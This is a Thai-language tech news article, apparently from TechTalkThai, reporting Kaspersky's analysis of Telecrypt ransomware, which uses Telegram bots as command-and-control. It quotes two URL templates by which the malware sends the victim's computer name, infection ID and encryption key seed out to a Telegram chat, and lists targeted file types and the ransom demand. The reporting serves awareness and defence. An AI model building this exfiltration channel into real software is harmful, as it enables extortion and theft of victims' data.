พบ Ransomware ตัวใหม่ ใช้ Telegram เป็น C&C Server

kaspersky_logo

นักวิจัยด้านความมั่นคงปลอดภัยจาก Kaspersky Lab ออกมาเปิดเผยถึง Ransomware ตัวใหม่ล่าสุด ชื่อว่า Telecrypt ซึ่งใช้ช่องทางของ Telegram แอพพลิเคชันสำหรับรับส่งข้อความที่มีความมั่นคงปลอดภัยสูง ในการส่งข้อมูลระหว่างมัลแวร์และแฮ็คเกอร์

Credit: Nicescene/ShutterStock
Credit: Nicescene/ShutterStock

Telecrypt ถูกพัฒนาขึ้นโดยใช้ภาษา Delphi ซึ่ง Binary มีขนาดเพียง 3 MB เท่านั้น หลังจากที่ Telecrypt ถูกติดตั้งลงบนเครื่องของเหยื่อแล้ว มันจะทำการสร้าง Telegram Bot ผ่านทาง Telegram API ซึ่ง Bot แต่ละตัวจะมี Token ID ที่ได้จาก API เป็นของตัวเอง

หลังจากที่เหยื่อกดรัน Telecrypt Binary ตัว Telegram Bot จะทำการ Ping ไปยัง Telegram API ผ่านทาง https://api.telegram.org/bot/GetMe เพื่อให้มั่นใจว่า Telegram Bot ยังคงทำงานได้ และไม่ถูก Telegram Admin จัดการ จากนั้น Telecrypt จะใช้โปรโตคอลของ Telegram ในการส่งข้อความผ่านเข้าไปยังช่องทางของ Telegram โดยใช้ Token ID ที่ได้รับมากในตอนแรก ซึ่งข้อความที่ส่งออกไปประกอบด้วย Computer Name, Infection ID และ Key Seed ซึ่งเป็นชุดตัวเลขที่ใช้เป็นกุญแจสำหรับเข้ารหัสไฟล์ข้อมูล

https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >

ถัดมา Telecrypt จะทำการค้นหาไฟล์ข้อมูล ได้แก่ DOC, DOCX, XLS, XLSX, JPG, JPEG, PNG, DT, DBF, CD และ PDF เพื่อทำการเข้ารหัส ซึ่งบางเวอร์ชันจะไม่ใส่นามสกุลใดต่อท้ายไฟล์ แต่บางเวอร์ชันจะใส่นามสกุล .Xcri เพิ่มเข้าไป เมื่อเข้ารหัสไฟล์ทั้งหมดเสร็จเรียบร้อย Telecrypt จะส่งข้อความไปช่องทางเดิม แต่เพิ่มพารามิเตอร์ Stop เข้าไปด้วย

https://api.telegram.org/bot< token >/sendmessage?chat_id=< chat >&text=< computer_name >_< infection_id >_< key_seed >stop

จากนั้น Telecrypt จะดาวน์โหลดไฟล์ Xhelp.exe มาติดตั้งลงบนเครื่องของเหยื่อเพื่อแสดงข้อความเรียกค่าไถ่ดังรูปด้านล่าง

ข้อความเรียกค่าไถ่
ข้อความเรียกค่าไถ่
ระบุให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi
ระบุให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi
หลังปลดรหัสจะระบุข้อความ "ขอบคุณที่ช่วยสนับสนุนเงินทุนให้แก่โปรแกรมเมอร์ตัวน้อยๆ "
หลังปลดรหัสจะระบุข้อความ “ขอบคุณที่ช่วยสนับสนุนเงินทุนให้แก่โปรแกรมเมอร์ตัวน้อยๆ “

ข้อความเรียกค่าไถ่ถูกเขียนในภาษารัสเซีย และเรียกร้องเงินจำนวน 5,000 Rubles หรือประมาณ 2,800 บาท เพื่อปลดรหัสไฟล์ โดยให้ชำระเงินผ่านทาง Yandex.Money หรือ Qiwi ซึ่งเป็นช่องทางการชำระเงินยอดนิยมของรัสเซีย

ที่มา: https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/


About techtalkthai

ทีมงาน TechTalkThai เป็นกลุ่มบุคคลที่ทำงานในสาย Enterprise IT ที่มีความเชี่ยวชาญทางด้าน Network, Security, Server, Storage, Operating System และ Virtualization มารวมตัวกันเพื่ออัพเดตข่าวสารทางด้าน Enterprise IT ให้แก่ชาว IT ในไทยโดยเฉพาะ

Check Also

TechTalkThai คว้ารางวัลในงาน Prime Minister Awards: Thailand Cybersecurity Excellence Award 2022

บริษัทเทคทอล์กไทยกรุ๊ป จำกัด (TechTalkThai) โดยคุณสุธีร์ กิจเจริญการกุล ผู้ร่วมก่อตั้งและประธานบริษัทฯ ได้รับเกียรติเข้ารับมอบโล่รางวัลดีเด่น ในฐานะหน่วยงานให้การสนับสนุนการดำเนินการด้านความมั่นคงปลอดภัยไซเบอร์ของประเทศดีเด่น Cybersecurity Excellence Award (Supporting) ภายในงาน Prime Minister …

Tanium ร่วมกับ Microsoft Intelligent Security Association เพื่อเสริมความแข็งแกร่งให้กับความปลอดภัยด้านไอที

Microsoft และ Tanium จะเปลี่ยนอนาคตของการรักษาความปลอดภัยและการดำเนินงานด้านไอทีสำหรับองค์กร